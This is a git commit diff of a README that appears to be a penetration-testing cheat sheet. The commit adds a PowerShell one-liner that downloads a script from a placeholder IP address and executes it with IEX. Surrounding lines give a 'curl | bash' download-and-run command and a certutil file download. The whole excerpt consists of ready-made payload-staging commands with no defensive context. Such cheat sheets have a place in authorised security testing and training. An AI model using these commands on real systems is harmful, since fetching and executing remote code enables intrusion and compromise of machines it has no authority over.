Update README.md

This commit is contained in:
Joe Totes
2022-09-01 11:59:19 -04:00
committed by GitHub
parent a33a74b6ed
commit 70186daff9

View File

@@ -730,6 +730,9 @@ curl {IP ADDRESS}/{FILE}
# Linux - Download file and execute in bash: # Linux - Download file and execute in bash:
curl {IP ADDRESS}/{FILE.sh} | bash curl {IP ADDRESS}/{FILE.sh} | bash
# Windows - Download file and execute in powershell:
powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")'
# Windows - Download file using certutil # Windows - Download file using certutil
certutil -split -f -urlcache http://{IP ADDRESS}/{FILE} certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}